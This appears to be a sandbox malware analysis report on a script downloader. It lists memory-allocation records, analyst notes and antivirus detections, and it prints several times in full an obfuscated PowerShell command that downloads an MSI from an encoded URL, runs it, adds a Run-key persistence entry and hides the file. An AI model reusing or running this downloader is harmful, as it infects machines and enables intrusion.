heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027f0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027f1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027f2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027f3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027f4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027f5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027f6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027f7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027f8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027f9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027fa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027fb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027fc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027fd000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027fe000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027ff000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02800000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02801000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02802000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02803000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02804000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

Analyst note: all of the PAGE_EXECUTE_READWRITE allocations and protection changes above are in PID 2092 (powershell.exe) with process_handle 0xffffffff, i.e. the current process. The script has no injection primitive (no Add-Type, no VirtualAlloc/CreateThread P/Invoke, no reflective loading), so these are most plausibly the .NET JIT's RWX code heap rather than shellcode staging — TODO confirm against a clean powershell.exe baseline before treating heap_dep_bypass=1 as an indicator.
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk — note the unexpanded %ProgramData% token joined under the Temp directory; this looks like a sandbox path-resolution artifact of the PowerShell Start Menu shortcut rather than a file the sample created — TODO confirm against the dropped-files list.
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function oGEDCAcL($FlnMpBxK, $AgMxaC){[IO.File]::WriteAllBytes($FlnMpBxK, $AgMxaC)};function PNjTla($FlnMpBxK){if($FlnMpBxK.EndsWith((bShFjqP @(4244,4298,4306,4306))) -eq $True){Start-Process (bShFjqP @(4312,4315,4308,4298,4306,4306,4249,4248,4244,4299,4318,4299)) $FlnMpBxK}else{Start-Process $FlnMpBxK}};function jSNvCEiiX($FlnMpBxK, $VQwqYETV){[Microsoft.Win32.Registry]::SetValue((bShFjqP @(4270,4273,4267,4287,4293,4265,4283,4280,4280,4267,4276,4282,4293,4283,4281,4267,4280,4290,4281,4309,4300,4314,4317,4295,4312,4299,4290,4275,4303,4297,4312,4309,4313,4309,4300,4314,4290,4285,4303,4308,4298,4309,4317,4313,4290,4265,4315,4312,4312,4299,4308,4314,4284,4299,4312,4313,4303,4309,4308,4290,4280,4315,4308)), $VQwqYETV, $FlnMpBxK)};function FvPeqUFa($FlnMpBxK){$icpWe=(bShFjqP @(4270,4303,4298,4298,4299,4308));$YwLPNbBH=(Get-ChildItem $FlnMpBxK -Force);$YwLPNbBH.Attributes=$YwLPNbBH.Attributes -bor ([IO.FileAttributes]$icpWe).value__};function CBgQtta($kpSwxupu){$MSwCV = New-Object (bShFjqP @(4276,4299,4314,4244,4285,4299,4296,4265,4306,4303,4299,4308,4314));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$AgMxaC = $MSwCV.DownloadData($kpSwxupu);return $AgMxaC};function bShFjqP($sCjSPqnz){$pPsWrYNz=4198;$eqBSpUkG=$Null;foreach($kPMiigIX in $sCjSPqnz){$eqBSpUkG+=[char]($kPMiigIX-$pPsWrYNz)};return $eqBSpUkG};function paTeG(){$HDgYp = $env:APPDATA + '\';$YScpLG = CBgQtta (bShFjqP @(4302,4314,4314,4310,4313,4256,4245,4245,4310,4315,4296,4243,4249,4253,4298,4249,4255,4254,4252,4252,4251,4254,4295,4300,4250,4251,4247,4297,4255,4298,4251,4248,4296,4296,4255,4300,4250,4254,4248,4296,4249,4299,4248,4298,4244,4312,4248,4244,4298,4299,4316,4245,4277,4276,4270,4279,4276,4270,4268,4282,4244,4307,4313,4303));$iEiUK = $HDgYp + 'ONHQNHFT.msi';oGEDCAcL $iEiUK $YScpLG;PNjTla $iEiUK;$VQwqYETV = 'iJOtPBQ';jSNvCEiiX $iEiUK $VQwqYETV;FvPeqUFa $iEiUK;;;;}paTeG;
cmdline powershell.exe -ExecutionPolicy UnRestricted function oGEDCAcL($FlnMpBxK, $AgMxaC){[IO.File]::WriteAllBytes($FlnMpBxK, $AgMxaC)};function PNjTla($FlnMpBxK){if($FlnMpBxK.EndsWith((bShFjqP @(4244,4298,4306,4306))) -eq $True){Start-Process (bShFjqP @(4312,4315,4308,4298,4306,4306,4249,4248,4244,4299,4318,4299)) $FlnMpBxK}else{Start-Process $FlnMpBxK}};function jSNvCEiiX($FlnMpBxK, $VQwqYETV){[Microsoft.Win32.Registry]::SetValue((bShFjqP @(4270,4273,4267,4287,4293,4265,4283,4280,4280,4267,4276,4282,4293,4283,4281,4267,4280,4290,4281,4309,4300,4314,4317,4295,4312,4299,4290,4275,4303,4297,4312,4309,4313,4309,4300,4314,4290,4285,4303,4308,4298,4309,4317,4313,4290,4265,4315,4312,4312,4299,4308,4314,4284,4299,4312,4313,4303,4309,4308,4290,4280,4315,4308)), $VQwqYETV, $FlnMpBxK)};function FvPeqUFa($FlnMpBxK){$icpWe=(bShFjqP @(4270,4303,4298,4298,4299,4308));$YwLPNbBH=(Get-ChildItem $FlnMpBxK -Force);$YwLPNbBH.Attributes=$YwLPNbBH.Attributes -bor ([IO.FileAttributes]$icpWe).value__};function CBgQtta($kpSwxupu){$MSwCV = New-Object (bShFjqP @(4276,4299,4314,4244,4285,4299,4296,4265,4306,4303,4299,4308,4314));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$AgMxaC = $MSwCV.DownloadData($kpSwxupu);return $AgMxaC};function bShFjqP($sCjSPqnz){$pPsWrYNz=4198;$eqBSpUkG=$Null;foreach($kPMiigIX in $sCjSPqnz){$eqBSpUkG+=[char]($kPMiigIX-$pPsWrYNz)};return $eqBSpUkG};function paTeG(){$HDgYp = $env:APPDATA + '\';$YScpLG = CBgQtta (bShFjqP @(4302,4314,4314,4310,4313,4256,4245,4245,4310,4315,4296,4243,4249,4253,4298,4249,4255,4254,4252,4252,4251,4254,4295,4300,4250,4251,4247,4297,4255,4298,4251,4248,4296,4296,4255,4300,4250,4254,4248,4296,4249,4299,4248,4298,4244,4312,4248,4244,4298,4299,4316,4245,4277,4276,4270,4279,4276,4270,4268,4282,4244,4307,4313,4303));$iEiUK = $HDgYp + 'ONHQNHFT.msi';oGEDCAcL $iEiUK $YScpLG;PNjTla $iEiUK;$VQwqYETV = 'iJOtPBQ';jSNvCEiiX $iEiUK $VQwqYETV;FvPeqUFa $iEiUK;;;;}paTeG;
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: powershell.exe
parameters: -ExecutionPolicy UnRestricted function oGEDCAcL($FlnMpBxK, $AgMxaC){[IO.File]::WriteAllBytes($FlnMpBxK, $AgMxaC)};function PNjTla($FlnMpBxK){if($FlnMpBxK.EndsWith((bShFjqP @(4244,4298,4306,4306))) -eq $True){Start-Process (bShFjqP @(4312,4315,4308,4298,4306,4306,4249,4248,4244,4299,4318,4299)) $FlnMpBxK}else{Start-Process $FlnMpBxK}};function jSNvCEiiX($FlnMpBxK, $VQwqYETV){[Microsoft.Win32.Registry]::SetValue((bShFjqP @(4270,4273,4267,4287,4293,4265,4283,4280,4280,4267,4276,4282,4293,4283,4281,4267,4280,4290,4281,4309,4300,4314,4317,4295,4312,4299,4290,4275,4303,4297,4312,4309,4313,4309,4300,4314,4290,4285,4303,4308,4298,4309,4317,4313,4290,4265,4315,4312,4312,4299,4308,4314,4284,4299,4312,4313,4303,4309,4308,4290,4280,4315,4308)), $VQwqYETV, $FlnMpBxK)};function FvPeqUFa($FlnMpBxK){$icpWe=(bShFjqP @(4270,4303,4298,4298,4299,4308));$YwLPNbBH=(Get-ChildItem $FlnMpBxK -Force);$YwLPNbBH.Attributes=$YwLPNbBH.Attributes -bor ([IO.FileAttributes]$icpWe).value__};function CBgQtta($kpSwxupu){$MSwCV = New-Object (bShFjqP @(4276,4299,4314,4244,4285,4299,4296,4265,4306,4303,4299,4308,4314));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$AgMxaC = $MSwCV.DownloadData($kpSwxupu);return $AgMxaC};function bShFjqP($sCjSPqnz){$pPsWrYNz=4198;$eqBSpUkG=$Null;foreach($kPMiigIX in $sCjSPqnz){$eqBSpUkG+=[char]($kPMiigIX-$pPsWrYNz)};return $eqBSpUkG};function paTeG(){$HDgYp = $env:APPDATA + '\';$YScpLG = CBgQtta (bShFjqP @(4302,4314,4314,4310,4313,4256,4245,4245,4310,4315,4296,4243,4249,4253,4298,4249,4255,4254,4252,4252,4251,4254,4295,4300,4250,4251,4247,4297,4255,4298,4251,4248,4296,4296,4255,4300,4250,4254,4248,4296,4249,4299,4248,4298,4244,4312,4248,4244,4298,4299,4316,4245,4277,4276,4270,4279,4276,4270,4268,4282,4244,4307,4313,4303));$iEiUK = $HDgYp + 'ONHQNHFT.msi';oGEDCAcL $iEiUK $YScpLG;PNjTla $iEiUK;$VQwqYETV = 'iJOtPBQ';jSNvCEiiX $iEiUK $VQwqYETV;FvPeqUFa $iEiUK;;;;}paTeG;
filepath: powershell.exe
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function oGEDCAcL($FlnMpBxK, $AgMxaC){[IO.File]::WriteAllBytes($FlnMpBxK, $AgMxaC)};function PNjTla($FlnMpBxK){if($FlnMpBxK.EndsWith((bShFjqP @(4244,4298,4306,4306))) -eq $True){Start-Process (bShFjqP @(4312,4315,4308,4298,4306,4306,4249,4248,4244,4299,4318,4299)) $FlnMpBxK}else{Start-Process $FlnMpBxK}};function jSNvCEiiX($FlnMpBxK, $VQwqYETV){[Microsoft.Win32.Registry]::SetValue((bShFjqP @(4270,4273,4267,4287,4293,4265,4283,4280,4280,4267,4276,4282,4293,4283,4281,4267,4280,4290,4281,4309,4300,4314,4317,4295,4312,4299,4290,4275,4303,4297,4312,4309,4313,4309,4300,4314,4290,4285,4303,4308,4298,4309,4317,4313,4290,4265,4315,4312,4312,4299,4308,4314,4284,4299,4312,4313,4303,4309,4308,4290,4280,4315,4308)), $VQwqYETV, $FlnMpBxK)};function FvPeqUFa($FlnMpBxK){$icpWe=(bShFjqP @(4270,4303,4298,4298,4299,4308));$YwLPNbBH=(Get-ChildItem $FlnMpBxK -Force);$YwLPNbBH.Attributes=$YwLPNbBH.Attributes -bor ([IO.FileAttributes]$icpWe).value__};function CBgQtta($kpSwxupu){$MSwCV = New-Object (bShFjqP @(4276,4299,4314,4244,4285,4299,4296,4265,4306,4303,4299,4308,4314));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$AgMxaC = $MSwCV.DownloadData($kpSwxupu);return $AgMxaC};function bShFjqP($sCjSPqnz){$pPsWrYNz=4198;$eqBSpUkG=$Null;foreach($kPMiigIX in $sCjSPqnz){$eqBSpUkG+=[char]($kPMiigIX-$pPsWrYNz)};return $eqBSpUkG};function paTeG(){$HDgYp = $env:APPDATA + '\';$YScpLG = CBgQtta (bShFjqP @(4302,4314,4314,4310,4313,4256,4245,4245,4310,4315,4296,4243,4249,4253,4298,4249,4255,4254,4252,4252,4251,4254,4295,4300,4250,4251,4247,4297,4255,4298,4251,4248,4296,4296,4255,4300,4250,4254,4248,4296,4249,4299,4248,4298,4244,4312,4248,4244,4298,4299,4316,4245,4277,4276,4270,4279,4276,4270,4268,4282,4244,4307,4313,4303));$iEiUK = $HDgYp + 'ONHQNHFT.msi';oGEDCAcL $iEiUK $YScpLG;PNjTla $iEiUK;$VQwqYETV = 'iJOtPBQ';jSNvCEiiX $iEiUK $VQwqYETV;FvPeqUFa $iEiUK;;;;}paTeG;
cmdline powershell.exe -ExecutionPolicy UnRestricted function oGEDCAcL($FlnMpBxK, $AgMxaC){[IO.File]::WriteAllBytes($FlnMpBxK, $AgMxaC)};function PNjTla($FlnMpBxK){if($FlnMpBxK.EndsWith((bShFjqP @(4244,4298,4306,4306))) -eq $True){Start-Process (bShFjqP @(4312,4315,4308,4298,4306,4306,4249,4248,4244,4299,4318,4299)) $FlnMpBxK}else{Start-Process $FlnMpBxK}};function jSNvCEiiX($FlnMpBxK, $VQwqYETV){[Microsoft.Win32.Registry]::SetValue((bShFjqP @(4270,4273,4267,4287,4293,4265,4283,4280,4280,4267,4276,4282,4293,4283,4281,4267,4280,4290,4281,4309,4300,4314,4317,4295,4312,4299,4290,4275,4303,4297,4312,4309,4313,4309,4300,4314,4290,4285,4303,4308,4298,4309,4317,4313,4290,4265,4315,4312,4312,4299,4308,4314,4284,4299,4312,4313,4303,4309,4308,4290,4280,4315,4308)), $VQwqYETV, $FlnMpBxK)};function FvPeqUFa($FlnMpBxK){$icpWe=(bShFjqP @(4270,4303,4298,4298,4299,4308));$YwLPNbBH=(Get-ChildItem $FlnMpBxK -Force);$YwLPNbBH.Attributes=$YwLPNbBH.Attributes -bor ([IO.FileAttributes]$icpWe).value__};function CBgQtta($kpSwxupu){$MSwCV = New-Object (bShFjqP @(4276,4299,4314,4244,4285,4299,4296,4265,4306,4303,4299,4308,4314));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$AgMxaC = $MSwCV.DownloadData($kpSwxupu);return $AgMxaC};function bShFjqP($sCjSPqnz){$pPsWrYNz=4198;$eqBSpUkG=$Null;foreach($kPMiigIX in $sCjSPqnz){$eqBSpUkG+=[char]($kPMiigIX-$pPsWrYNz)};return $eqBSpUkG};function paTeG(){$HDgYp = $env:APPDATA + '\';$YScpLG = CBgQtta (bShFjqP @(4302,4314,4314,4310,4313,4256,4245,4245,4310,4315,4296,4243,4249,4253,4298,4249,4255,4254,4252,4252,4251,4254,4295,4300,4250,4251,4247,4297,4255,4298,4251,4248,4296,4296,4255,4300,4250,4254,4248,4296,4249,4299,4248,4298,4244,4312,4248,4244,4298,4299,4316,4245,4277,4276,4270,4279,4276,4270,4268,4282,4244,4307,4313,4303));$iEiUK = $HDgYp + 'ONHQNHFT.msi';oGEDCAcL $iEiUK $YScpLG;PNjTla $iEiUK;$VQwqYETV = 'iJOtPBQ';jSNvCEiiX $iEiUK $VQwqYETV;FvPeqUFa $iEiUK;;;;}paTeG;
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\iJOtPBQ reg_value C:\Users\test22\AppData\Roaming\ONHQNHFT.msi
parent_process powershell.exe martian_process C:\Users\test22\AppData\Roaming\ONHQNHFT.msi
option -executionpolicy unrestricted value Attempts to bypass execution policy
option -executionpolicy unrestricted value Attempts to bypass execution policy
CTX vba.trojan.generic
Skyhigh VBS/Downloader.acl
Arcabit Trojan.Generic.D4770615
Symantec Scr.Malscript!gen11
ESET-NOD32 VBS/TrojanDownloader.Agent.XAO
Avast Script:SNH-gen [Trj]
Kaspersky HEUR:Trojan-Downloader.Script.Generic
BitDefender Trojan.GenericKD.74909205
NANO-Antivirus Trojan.Script.Downloader.jpdglv
MicroWorld-eScan Trojan.GenericKD.74909205
Emsisoft Trojan.GenericKD.74909205 (B)
DrWeb Trojan.DownLoader47.53219
Ikarus Trojan-Downloader.VBS.Agent
FireEye Trojan.GenericKD.74909205
Jiangmin Trojan.Script.amhb
Google Detected
Kingsoft hta.Troj.2024093
Microsoft Trojan:HTA/Malgent!MSR
ViRobot HTML.Z.Agent.22114
GData HTML.Trojan.Agent.BCOUUH
Varist VBS/Agent.AZR!Eldorado
McAfee VBS/Downloader.acl
Tencent Vbs.Trojan-Downloader.Der.Udkl
huorong TrojanDownloader/VBS.Maloader.n
Fortinet VBS/Agent.UQJ!tr
AVG Script:SNH-gen [Trj]
alibabacloud Trojan[downloader]:Win/Generic.Gen